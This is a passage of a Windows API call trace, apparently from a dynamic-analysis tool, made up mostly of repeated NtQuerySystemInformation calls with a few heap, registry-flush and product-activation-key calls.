(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0190.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb90, Length=0x58, ResultLength=0x0) [0190.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdab0, Length=0x38, ResultLength=0x0) [0190.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0190.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0190.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0190.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0190.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd950, Length=0x28, ResultLength=0x0) [0190.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdab0, Length=0x38, ResultLength=0x0) [0190.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9d0, Length=0x28, ResultLength=0x0) [0190.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9d0, Length=0x28, ResultLength=0x0) [0190.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdab0, Length=0x38, ResultLength=0x0) [0190.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd930, Length=0x20, ResultLength=0x0) [0190.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x20, ResultLength=0x0) [0190.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x20, ResultLength=0x0) [0190.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x20, ResultLength=0x0) [0190.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdab0, Length=0x38, ResultLength=0x0) [0190.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd930, Length=0x20, ResultLength=0x0) [0190.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0190.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0190.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb90, Length=0x58, ResultLength=0x0) [0190.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda70, Length=0x38, ResultLength=0x0) [0190.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x28, ResultLength=0x0) [0190.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x28, ResultLength=0x0) [0190.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x28, ResultLength=0x0) [0190.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x28, ResultLength=0x0) [0190.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd920, Length=0x28, ResultLength=0x0) [0190.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda70, Length=0x38, ResultLength=0x0) [0190.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda70, Length=0x38, ResultLength=0x0) [0190.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9a0, Length=0x28, ResultLength=0x0) [0190.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9a0, Length=0x28, ResultLength=0x0) [0190.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda70, Length=0x38, ResultLength=0x0) [0190.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda70, Length=0x38, ResultLength=0x0) [0190.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd810, Length=0x20, ResultLength=0x0) [0190.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x20, ResultLength=0x0) [0190.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x20, ResultLength=0x0) [0190.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x20, ResultLength=0x0) [0190.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x20, ResultLength=0x0) [0190.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda70, Length=0x38, ResultLength=0x0) [0190.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd900, Length=0x20, ResultLength=0x0) [0190.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd880, Length=0x20, ResultLength=0x0) [0190.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd880, Length=0x20, ResultLength=0x0) [0190.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd880, Length=0x20, ResultLength=0x0) [0190.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda70, Length=0x38, ResultLength=0x0) [0190.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd900, Length=0x20, ResultLength=0x0) [0190.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd880, Length=0x20, ResultLength=0x0) [0190.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd880, Length=0x20, ResultLength=0x0) [0190.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd880, Length=0x20, ResultLength=0x0) [0190.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda70, Length=0x38, ResultLength=0x0) [0190.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd900, Length=0x20, ResultLength=0x0) [0190.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd890, Length=0x20, ResultLength=0x0) [0190.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd890, Length=0x20, ResultLength=0x0) [0190.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x20, ResultLength=0x0) [0190.317] GetTickCount () returned 0x117036d [0190.317] GetProcessHeap () returned 0x27fc8db0000 [0190.317] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc8e5e1d0 [0190.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x30, ResultLength=0x0) [0190.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdac0, Length=0x38, ResultLength=0x0) [0190.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdac0, Length=0x38, ResultLength=0x0) [0190.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdac0, Length=0x38, ResultLength=0x0) [0190.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda40, Length=0x30, ResultLength=0x0) [0190.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x38, ResultLength=0x0) [0190.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd910, Length=0x30, ResultLength=0x0) [0190.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdac0, Length=0x38, ResultLength=0x0) [0190.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdac0, Length=0x38, ResultLength=0x0) [0190.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x30, ResultLength=0x0) [0190.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd960, Length=0x20, ResultLength=0x0) [0190.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x30, ResultLength=0x0) [0190.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd940, Length=0x30, ResultLength=0x0) [0190.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdac0, Length=0x38, ResultLength=0x0) [0190.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0191.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9f0, Length=0x30, ResultLength=0x0) [0191.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x18, ResultLength=0x0) [0191.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0191.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0191.057] RegFlushKey (hKey=0x33c) returned 0x0 [0191.967] NtLockProductActivationKeys (pPrivateVer=0x0, pSafeMode=0x0) returned 0x0 [0191.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0191.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdac0, Length=0x38, ResultLength=0x0) [0191.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0191.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdac0, Length=0x38, ResultLength=0x0) [0191.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0191.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdac0, Length=0x38, ResultLength=0x0) [0191.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x30, ResultLength=0x0) [0191.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd960, Length=0x20, ResultLength=0x0) [0191.970] NtQuerySystemInformation (SystemInformationClass=0xb9, 